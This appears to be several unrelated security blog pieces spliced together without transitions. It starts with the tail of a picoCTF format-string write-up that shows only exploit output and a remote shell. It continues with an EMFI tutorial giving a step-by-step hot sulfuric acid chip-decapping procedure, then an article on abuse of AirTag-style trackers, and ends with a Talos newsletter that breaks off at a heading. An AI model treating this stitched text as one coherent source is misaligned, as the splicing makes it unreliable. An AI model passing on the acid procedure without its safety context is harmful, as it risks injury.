Note that you’ll need to substitute the port that is provided to you after launching the instance on the picoCTF platform.
```bash
### Sample Output
...
[*] Payload successfully sent, enjoy the shell!
[*] Switching to interactive mode
$ ls flag.txt
flag.txt
```
That concludes the exploit, after which we can submit our flag. In a real-world scenario, this kind of remote code execution would clearly pose a great risk.
Conclusion
The preceding challenges (format string 0, 1 and 2) proved to be a great help in understanding format string vulnerabilities and how to exploit them. Since Linux exploitation is a new topic for me, this was a great way to practice these types of vulnerabilities during a fun event.
Format string vulnerabilities are less common than they used to be; however, our IoT colleagues assured me they encountered some recently during an IoT device assessment.
That’s why it’s important to adhere to:
Input Validation
Limit User-Controlled Input
Enable (or pay attention to already enabled) compiler warnings for format string vulnerabilities
Secure Coding Practices
This should greatly limit the risk of format string vulnerabilities still being present in current day applications.
Wiebe Willems is a Cyber Security Researcher active in the Research & Development team at NVISO. With his extensive background in Red & Purple Teaming, he is now driving the innovation efforts of NVISO’s Red Team forward to deliver even better advisory to its clients.
Wiebe honed his skills by getting certifications for well-known Red Teaming trainings, next to taking deeply technical courses about stack & heap exploitation.
Recently, the automotive VR team has undertaken an effort to reproduce the software extraction attack against one of the target devices used during the Automotive Pwn2Own 2024 held in Tokyo, Japan. The electromagnetic fault injection (EMFI) approach was chosen to attempt an attack against the existing readout protection mechanisms. This blog post details preparatory steps to speed up the attack, hopefully considerably.
Electromagnetic fault injection
In general, fault injection attacks against hardware attempt to produce some sort of gain for an attacker by injecting faults into a device under attack: manipulating clock pulses, supply voltages, temperature, or electromagnetic fields around the device, or aiming short light pulses at certain locations on it. Of these vectors, EMFI stands out as probably the only attack approach that requires close to no modifications of the device under attack, although all action must be conducted at quite a short distance. The attack then proceeds by moving an EM probe above the device in very small increments and triggering an EM pulse. With any luck, this disturbs the normal operation of the device under attack in just the right way to cause the desired effect.
Practically speaking, some sort of an EM pulse tool is required to conduct the attack. In this case, the PicoEMP was chosen for that purpose, which has been mounted on a modified 3D printer carriage.
Figure 1 - The ChipSHOUTER-PicoEMP
However, the device in question (a GD32F407Z by GigaDevice) is physically rather large, with the package measuring 20 mm on each side. Considering how long each individual attempt runs, the fact that attempts need to be retried multiple times to collect meaningful outcome statistics, and the rather small increments used to move the probe, it makes sense to narrow down the search area as much as possible. Injecting EM faults into the epoxy encapsulation would not bring much of an effect.
Decapping
Unfortunately, the encapsulation is not transparent and does not allow for easy visual identification of the die in the package. This means some way of exposing the die is required to measure it, or better yet, a way of leaving the die in the package, making it possible to measure both the die dimensions and the position of the die within the package.
There are multiple approaches to decapsulation, or decapping for short:
· Mechanical: sanding or milling the package, or cracking the encapsulation when heated
· Chemical: applying acid to dissolve the encapsulation
· Thermal: placing the package in a furnace to burn the encapsulation away
· Optical: using a laser to burn the encapsulation away in a precise manner
Of these, many require specialized equipment (mill, laser, furnace, fume hood for nitric acid), are time-consuming (sanding), or do not preserve important information (cracking the package). The choice was thus limited to what was available: hot sulfuric acid.
DANGER: Hot sulfuric acid is extremely corrosive; avoid spilling and wear proper PPE at all times.
DANGER: Sulfuric acid vapors are extremely corrosive; avoid inhaling and work in a well-ventilated area (fume hood or outside).
NOTE: Study relevant safety information including but not limited to materials handling, spill containment, and clean-up procedures before working with any hazardous chemicals.
NOTE: This blog post was written purely for educational purposes; any attempts to replicate the work are at your own risk.
Decapping process
As my home lab is, sadly, not equipped with a fume hood, all work was conducted outside.
Figure 2 - Example of tools used
The following tools were used:
· Sulfuric acid, 96%
· A heat source in the form of a hot air station
· A crocodile clip “helping hands”
· A squirt bottle with acetone
· A PE pipette
· A waste container
To begin, the device under attack was fixed in the clip, and a small drop of acid was applied with the pipette to the package center.
Figure 3 - Applying sulfuric acid
The device was then heated using the hot air station set to 200°C and a moderate air flow of around 40%. The aim of this process is to slowly dissolve the packaging epoxy. Heating continued until some fuming was observed from the drop and was stopped before any bubbling occurred. If the acid gets hot enough to produce bubbles, the material forms a hard carbonized “cake” that is problematic to remove; unfortunately, this has been a problem before.
After the acid visibly darkened, which should take around 1 minute ±50%, the heating was stopped and the device was allowed to cool down somewhat. Then, the acid was washed off with acetone into the waste container. The device was then dried off with hot air to remove moisture.
The process was then repeated multiple times, with each iteration removing a bit of the packaging material. This was captured in the following series of images (more steps were taken than is presented here):
Figure 4 - Time lapse of decapping process
A stack of dice slowly emerged from the package: the larger one is the microcontroller itself, and the smaller one is the serial Flash memory holding all the programmed code and data. Unfortunately, the current process does not preserve the bond wires, rendering the device inoperable. Its operation was not required in our case. This could possibly be mitigated by using a 98% acid and anhydrous acetone – something to attempt in the future.
Measurements
The end result of the decapping process is pictured below.
Figure 5 - End result of decapping
Using a graphics editor, it is possible to take measurements in pixels of the package, the die, and the die positioning. This came out to be the following:
· Package size: 1835x1835 pixels (measured) = 20x20 mm (known from the datasheet)
· Pixels per mm: 91.75
· Die size: 366x366 pixels (measured) = 4x4 mm (computed)
· Die offset from bottom left: 745x745 pixels (measured) = 8.12x8.12 mm (computed)
The obtained numbers are immediately useful for programming the EM probe motion restricted to the die area only. To find out how much experiment time this could save, let’s compute the areas: 4x4 = 16 mm² for the die itself, and 20x20 = 400 mm² for the whole package. This is a 25-fold decrease in area, and thus in experiment time.
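The pixel-to-millimeter conversion can be reproduced in a few lines of Python, using the numbers from the measurements above:

```python
# Package size in pixels (measured) and mm (known from the datasheet)
package_px, package_mm = 1835, 20.0
px_per_mm = package_px / package_mm      # 91.75 pixels per mm

die_mm = round(366 / px_per_mm, 1)       # die side length: 4.0 mm
offset_mm = round(745 / px_per_mm, 2)    # die offset from bottom left: 8.12 mm

# Scanning only the die instead of the whole package shrinks the search area
reduction = (package_mm ** 2) / (die_mm ** 2)
print(px_per_mm, die_mm, offset_mm, reduction)  # 91.75 4.0 8.12 25.0
```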
Another approach that could avoid the decapping process is moving the probe in a spiral fashion, starting from the package center and moving outwards. This is of course possible to implement. However, the two dice might be packaged side-by-side instead of stacked as in this example, which would severely decrease the gain from this approach. Given that decapping takes no more than 1-2 hours including cleanup, it was deemed well worth the information gained, not to mention the die pictures obtained.
Conclusion
I hope you enjoyed this brief tutorial. Again, please take caution when using sulfuric acid or any other corrosive agents. Please dispose of waste materials responsibly. The world of hardware hacking offers many opportunities for discovery. We’ll continue to post guides and methodologies in future posts. Until then, you can follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.
Since the advent of products like the Tile and Apple AirTag, both used to keep track of easily lost items like wallets, keys and purses, bad actors and criminals have found ways to abuse them.
These adversaries can range from criminals simply looking to steal a physical object, to a jealous or suspicious spouse or partner who wants to keep tabs on their significant other.
Apple and other manufacturers who make these devices have since taken several steps to curb their abuse and make them more secure. Most recently, Google and Apple announced new alerts for Android and iOS devices that warn users when an unknown location-tracking device appears to be moving with them.
“With this new capability, users will now get an ‘[Item] Found Moving With You’ alert on their device if an unknown Bluetooth tracking device is seen moving with them over time, regardless of the platform the device is paired with,” Apple stated in its announcement.
Motorola, Jio and Eufy also announced that they will adhere to these new standards and should release compliant products soon.
Certainly, products like the AirTag and Samsung trackers that these companies have direct control over will now be more secure, and hopefully less ripe for abuse by a bad actor, but it’s far from a total solution to the problem that these types of products pose.
As I’ve pointed out in the past with security cameras and any other range of internet-connected devices, online stores are filled with these types of products, promising to track users’ personal items with an app so they don’t lose common household items like their phones, wallets and keys.
Amazon has countless listings under “location tag” for a range of AirTag-like products made by unknown manufacturers. Some of these products are slim enough to fit right into the credit card pocket of a wallet or purse, and others are smaller than the average AirTag and even advertise that they can remain hidden inside a car.
I admittedly haven’t been able to dive into these individual devices, but some of them come with their own third-party apps, which bring their own set of security caveats and take security completely out of the platform developers’ hands.
There are also other “find my device”-type services that pose additional security concerns outside of just buying a small tag. Android’s new, enhanced “Find My Device” network is a crowdsourced solution to help users potentially find their lost devices, similar to iOS’ Find My network.
The Find My Device network works by using other Android devices to silently relay a registered device’s approximate location, even if the device being searched for is offline or turned off. In the wrong hands, this capability could be abused in a range of ways on its own.
So, rather than relying on developers and manufacturers to make these services more secure, I have a few tips for how to use AirTag-like devices safely, if you really can’t come up with a better solution for not losing your keys.
Check for suspicious tracking devices. On iOS, this means opening the “Find My” app and navigating to Items > Items Detected Near You. Any unfamiliar AirTags will be listed here. On Android, you can do the same thing by going to Settings > Safety & Emergency > Unknown Tracker Alerts > Scan Now.
Remove yourself from any “Sharing Groups” unless it’s a trusted contact in your phone using the Find My app on iOS.
If location tracking is your primary concern (especially for parents and their children) using the Find My app on iOS and Android is generally a more secure option than trusting a third-party app downloaded from the app store or relying on a Bluetooth connection.
Manage individual apps’ settings to ensure only the services that *really* need to track your device’s physical location are using it. (For example, you probably don’t need Facebook tracking that information.)
Since AirTags are connected to your Apple ID, ensure that login is secured with multi-factor authentication (MFA) or using a passkey.
The one big thing
Cisco recently developed and released a new feature to detect brand impersonation in emails when adversaries pretend to be a legitimate corporation. Threat actors employ a variety of techniques to embed brand logos within emails. One simple method involves inserting words associated with the brand into the HTML source of the email. New data from Talos found that popular brands like PayPal, Microsoft, NortonLifeLock and McAfee are among some of the most-impersonated brands in these types of phishing emails.
Why do I care?
Brand impersonation could happen on many online platforms, including social media, websites, emails and mobile applications. This type of threat exploits the familiarity and legitimacy of popular brand logos to solicit sensitive information from victims. In the context of email security, brand impersonation is commonly observed in phishing emails. Threat actors want to deceive their victims into giving up their credentials or other sensitive information by abusing the popularity of well-known brands.
So now what?
Well-known brands can protect themselves from this type of threat through asset protection as well. Domain names can be registered with various extensions to thwart threat actors attempting to use similar domains for malicious purposes. The other crucial step brands can take is to conceal their information from WHOIS records via privacy protection. And users who want to learn more about Cisco Secure Email Threat Defense's new brand impersonation detection tools can visit this site.
Top security headlines of the week
Adversaries have been quietly exploiting the backbone of cellular communications to track Americans’ location for years, according to a U.S. Cybersecurity and Infrastructure Security Agency (CISA) official. The official broke ranks with their agency and reportedly shared this information with the Federal Communications Commission (FCC). The official said that attackers have used vulnerabilities in the SS7 protocol to steal location data, monitor voice and text messages, and deliver spyware. Other targets have received text messages containing fake news or disinformation. SS7 is the protocol used across the globe that routes text messages and calls to different devices, but it has often been a target for attackers. In the past, other vulnerabilities in SS7 have been used to gain access to telecommunications providers’ networks. In their written comments to the FCC, the official said that these vulnerabilities are the “tip of the proverbial iceberg” of SS7-related exploits used against U.S. citizens. (404 Media, The Economist)
The FBI once again seized the main site belonging to BreachForums, a popular platform for buying and selling stolen personal information. Last year, international law enforcement agencies took down a previous version of the cybercrime site and arrested its administrator, but new pages quickly emerged, using three different domains since the last disruption. American law enforcement agencies also took control of the forum’s official Telegram account, and a channel belonging to the newest BreachForums administrator, “Baphomet.” However, the FBI has yet to publicly state anything about the takedown or any potential arrests. BreachForums isn’t expected to be gone for long, as another admin named “ShinyHunters” claims the site will be back with a new Onion domain soon. ShinyHunters claims they’ve regained access to the seized clearnet domain for BreachForums, though they did not provide specific methods. BreachForums is infamous for being a site where attackers can buy and sell stolen data, offer their hacking services or share recent TTPs. (TechCrunch, HackRead)
The U.S. Department of Justice charged three North Koreans with crimes related to impersonating others to obtain remote employment in the U.S., which in turn generated funding for North Korea’s military. The three men, along with a U.S. citizen, were charged with what the DOJ called “staggering fraud” in which they secured illicit work with several U.S. companies and government agencies using fraudulent identities from 60 real Americans. The U.S. citizen allegedly placed laptops belonging to U.S. companies at various residences so the North Koreans could hide their true location. North Korean state-sponsored actors have used these types of tactics for years, often relying on social media networks like LinkedIn to fake their personal information and obtain jobs or steal sensitive information from companies. More than 300 companies may have been affected, with the perpetrators earning more than $6.8 million, most of which was used to “raise revenue for the North Korean government and its illicit nuclear program,” according to the DOJ. (ABC News, Bloomberg)
Gergana Karadzhova-Dangela from Cisco Talos Incident Response will participate in a panel on “Using ECSF to Reduce the Cybersecurity Workforce and Skills Gap in the EU.” Karadzhova-Dangela participated in the creation of the EU cybersecurity framework, and will discuss how Cisco has used it for several of its internal initiatives as a way to recruit and hire new talent.
Bill Largent from Talos' Strategic Communications team will be giving our annual "State of Cybersecurity" talk at Cisco Live on Tuesday, June 4 at 11 a.m. Pacific time. Jaeson Schultz from Talos Outreach will have a talk of his own on Thursday, June 6 at 8:30 a.m. Pacific, and there will be several Talos IR-specific lightning talks at the Cisco Secure booth throughout the conference.
Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the critical importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches.
Most prevalent malware files from Talos telemetry over the past week